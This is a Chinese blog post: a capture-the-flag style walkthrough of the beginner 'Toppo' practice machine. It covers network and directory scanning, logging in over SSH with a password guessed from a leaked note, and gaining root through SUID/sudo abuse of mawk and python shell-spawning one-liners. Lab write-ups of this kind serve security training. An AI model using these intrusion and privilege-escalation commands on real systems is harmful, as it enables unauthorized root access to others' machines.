【靶机渗透】入门级Toppo靶机渗透练习

已于 2024-03-11 11:47:26 修改
阅读量432 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 网络安全
于 2021-08-30 18:53:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120003260
版权

1.主机发现:arp-scan -l,发现靶机ip为192.168.225.148,并进行访问

2.扫描端口,开启了80,22端口

nmap 192.168.225.148 -sV -sC -Pn -n -v -T5 -p-

3.扫目录发现admin的页面,进行访问:

dirb http://192.168.225.148

3.发现note.txt,根据提示:他不懂技术,不会改密码,所以猜测靶机密码为:12345ted123

4.尝试远程登录一下:

ssh 192.168.225.148 -l ted

5.比DC系列容易一些,远程登录后就可以按照常规思路进行提权,先查找SUID提权方案:

find / -perm -u=s -type f 2>/dev/null

也可以使用一下命令,发现不需要密码的awk:

cat /etc/sudoers

6.方法一:直接使用此命令进行提权:

mawk 'BEGIN {system("/bin/sh")}'

7.方法二:

这里因为python也存在SUID的权限,那么也是可以提权的

python2.7 -c 'import pty;pty.spawn("/bin/sh")'

8.因为,直接查看flag:

/usr/bin/mawk 'BEGIN{system("whoami")}'

/usr/bin/mawk 'BEGIN{system("ls /root")}'    //发现flag

/usr/bin/mawk 'BEGIN{system("cat /root/flag.txt ./")}'

提权awk科普:

awk是一种编程语言,用于在linux/unix下对文本和数据进行处理。数据可以来自标准输入、一个或多个文件,或其它命令的输出(即管道)。它支持用户自定义函数和动态正则表达式等先进功能,是linux/unix下的一个强大编程工具。它在命令行中使用,但更多是作为脚本来使用。

awk的处理文本和数据的方式是这样的,它逐行扫描文件,从第一行到最后一行,寻找匹配的特定模式的行,并在这些行上进行你想要的操作。如果没有指定处理动作,则把匹配的行显示到标准输出(屏幕),即默认处理动作是print;如果没有指定模式,则所有被操作所指定的行都被处理,即默认指定模式是全部。

awk分别代表其作者姓氏的第一个字母。因为它的作者是三个人,分别是Alfred AhoBrian KernighanPeter WeinbergergawkawkGNU版本,它提供了Bell实验室和GNU的一些扩展。

shell一样,awk也有好几种,常见的如awknawkmawkgawk

malloc_冲!
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
渗透入门Mr-robott靶机练习.doc
07-09
下面是Mr-Robot靶机的实践指南,旨在帮助初学者快速入门渗透测试领域。 一、网络扫描 在开始渗透测试之前,需要对目标网络进行扫描,以了解目标网络的结构和开放的端口。使用Nmap工具可以快速扫描局域网中的主机和...
基于Toppo渗透测试的学习笔记
gaily123的博客
10-09 376
基于Toppo渗透测试的学习笔记 靶机与kali均为NAT模式 kali ip为192.168.79.130 扫描 上nmap扫网段 发现靶机ip为192.168.79.147 扫端口发现22,80,111,42143 进80端口查看,是一个博客 没有什么完善的功能,于是扫后台目录 扫到admin进入发现有一个txt,为以下内容 Note to myself : I need to cha...
Vulnhub靶机练习——Toppo
weixin_45126664的博客
08-05 953
这是一次靶场练习,使用 kali 和 Vulnhub 的Toppo靶机 ,难度属于新手入门 ! 靶机下载地址: 1、https://download.vulnhub.com/toppo/Toppo.zip 2、https://download.vulnhub.com/toppo/Toppo.zip.torrent 知识点: 1、netdiscover发现局域网内靶机IP地址 2、nmap扫描端口、服务、漏洞 3、dirb路径扫描 4、根据发现的端口(服务),尝试相应的探测和攻击 5、cewl搜集页面关
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记_vulnhub入门靶场
最新发布
m0_60567881的博客
04-18 281
朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~一眼看上去有两个敏感的文件,一个是flag应该就是我们想要的答案了,还有一个是robots.txt。访问这个的时候发现了这个文件信息暴漏,好像并没有什么卵用,找了一圈一没发现啥。我们的网卡叫eth0 ,所以我们对这个网卡进行扫描这个网卡里有多少台设备。进来后发现是个登入界面,貌似没有什么信息,我们对它的目录进行扫描一下。因为目标主机和我们在同一个网段,我们可以扫描一一下我们的网卡。
网络安全小白入门必刷的8个靶场
libaiup的博客
10-20 1516
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。在里面的有很多靶机(但是会员才能玩历史靶机),各种难度层,从小白到大佬,都有适合你的靶机,并且经常更新,想要提升自我,不断挑战的同学可以尝试。操作简单,快速理解,让你轻松打开网络安全的大门。
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 2854
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 5990
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2786
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
靶机简单渗透测试
KKK_2178的博客
11-22 5497
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2289
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
vulnhub 之Toppo实战攻略
weixin_43862283的博客
04-14 608
vulnhub 之Toppo实战攻略 0x01 前言 作为信息安全中新入围的小白,实战还是很重要的,就从最基础的开始咯!找了Vulnhub中菜鸟中的菜鸟做的,跟大家分享一下。 0x02 环境及配置 Toppo:1 难度 : Beginner 网卡配置:桥接模式 DHCP 下载地址:: https://download.vulnhub.com/toppo/Toppo.zip 0x03 攻击 第一步,...
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5795
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
靶机渗透【lazysysadmin】
学信安技术 卫国家之门
01-11 6256
文章目录*一. lazysysadmin靶机安装*1. 下载靶机2. 打开靶机*二. lazysysadmin靶机渗透*1. 信息收集2. Web渗透3. 共享服务4. ssh服务5. 文件上传 一. lazysysadmin靶机安装 1. 下载靶机 百度网盘链接提取码 lazysysadmin.zip 提取码:m02v 2. 打开靶机 打开 VMware,在左上角选择 - - 文件 - - 打开 找到 lazysysadmin 靶机解压位置 开启后如图所示 二. lazysy
黑客零基础第二章--信息收集第五章-靶机实战Toppo:1
ShadowBlade
08-14 2927
Toppo:1是Vulnhub中easy的一个靶机,仅仅需要简单的信息收集,即可完成intrusion。非常适合我们的这一阶段练习
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值